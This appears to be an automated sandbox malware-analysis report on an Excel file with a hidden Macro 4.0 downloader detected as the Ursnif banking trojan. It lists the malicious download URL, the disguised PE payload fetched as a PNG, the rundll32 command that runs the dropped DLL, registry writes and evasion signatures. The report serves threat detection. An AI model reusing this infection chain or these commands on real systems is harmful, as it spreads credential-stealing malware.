
# Analysis Report http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls

## Overview

### General Information

 Sample URL: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls
 Analysis ID: 330745

### Detection

Hidden Macro 4.0 Ursnif
 Score: 84
 Range: 0 - 100
 Whitelisted: false
 Confidence: 100%

### Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (process start blacklist hit)
Injects files into Windows application
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64
 cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
   conhost.exe (PID: 684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
   wget.exe (PID: 5876 cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
 EXCEL.EXE (PID: 6840 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
   rundll32.exe (PID: 6524 cmdline: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
 iexplore.exe (PID: 5868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
   iexplore.exe (PID: 1584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
 iexplore.exe (PID: 5412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
   iexplore.exe (PID: 5512 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
 iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
   iexplore.exe (PID: 1500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

## Malware Configuration

No configs have been found
Source / Rule / Description / Author / Strings:
• 0x0:$header_docf: D0 CF 11 E0
• 0x4e0f7:$s1: Excel
• 0x505bd:$s1: Excel
• 0x50b62:$s1: Excel
• 0x50ec9:$s1: Excel
• 0x50f2f:$s1: Excel
• 0x50f48:$s1: Excel
• 0x3ad7:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |

## Sigma Overview

### System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell
 Source: Process started
 Author: Michael Haag, Florian Roth, Markus Neis
 Data:
 Command: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
 CommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
 CommandLine|base64offset|contains: ]
 Image: C:\Windows\SysWOW64\rundll32.exe
 NewProcessName: C:\Windows\SysWOW64\rundll32.exe
 OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
 ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
 ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
 ParentProcessId: 6840
 ProcessCommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
 ProcessId: 6524

## Signature Overview

### Software Vulnerabilities:

 Document exploit detected (process start blacklist hit)
 Allocates a big amount of memory (probably used for heap spraying)
 Source: excel.exe Memory has grown: Private usage: 1MB later: 115MB

### Networking:

 Source: http Image file has PE prefix:
 HTTP/1.1 200 OK
 Date: Tue, 15 Dec 2020 14:43:00 GMT
 Server: Apache/2.4.25 (Debian)
 Last-Modified: Tue, 15 Dec 2020 09:56:58 GMT
 ETag: "7d000-5b67dc7836e80"
 Accept-Ranges: bytes
 Content-Length: 512000
 Connection: close
 Content-Type: image/png
 Data Raw: [hex dump of the 512000-byte response body omitted]
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK (the same response as above: Server: Apache/2.4.25 (Debian), Content-Length: 512000, Content-Type: image/png); Data Raw: [hex dump omitted]
 Source: global traffic HTTP traffic detected:
 GET /ref-151220-BTC2XU590R2HT8.xls HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
 Accept: */*
 Accept-Encoding: identity
 Host: snenpinfrresertts.com
 Connection: Keep-Alive
 Source: global traffic HTTP traffic detected:
 GET /str.png HTTP/1.1
 Accept: */*
 Accept-Encoding: gzip, deflate
 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
 Host: snenpinfrresertts.com
 Connection: Keep-Alive
 Found strings which match to known social media urls
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: snenpinfrresertts.com
 Urls found in memory or binary data
 Uses HTTPS
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
 Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
 Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443

### Key, Mouse, Clipboard, Microphone and Screen Capturing:

 Yara detected Ursnif
 Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

### E-Banking Fraud:

 Yara detected Ursnif

### System Summary:

 Office process drops PE file
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
 Writes registry values via WMI
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
 Yara signature match
 Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
 Classification label
 Source: classification engine Classification label: mal84.troj.expl.evad.win@16/46@6/3
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:684:120:WilError_01
 Creates temporary files
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{850317AA-8546-462C-B1FE-96E615861FA5} - OProcSessId.dat
 Queries process information (via WMI, Win32_Process)
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
 Reads the hosts file
 Runs a DLL by calling functions
 Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
 Spawns processes
 Uses an in-process (OLE) Automation server
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed
 Uses new MSVCR Dlls
 Binary contains paths to debug symbols
 Source: Binary string: c:\CompanyLast\SideCircle\LawRoad\storyForm\numberEat\smell.pdb source: drgd.dbvf.3.dr
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
 Drops PE files
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
 Drops files with a non-matching file extension (content does not match file extension)
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf

### Hooking and other Techniques for Hiding and Protection:

 Yara detected Ursnif
 Monitors certain registry keys / values for changes (often done to protect autostart functionality)
 Disables application error messages (SetErrorMode)
 Found dropped PE file which has not been started or loaded
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
 Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
 Source: wget.exe, 00000002.00000002.654002429.0000000000B78000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

### HIPS / PFW / Operating System Protection Evasion:

 System process connects to network (likely due to code injection or exploit)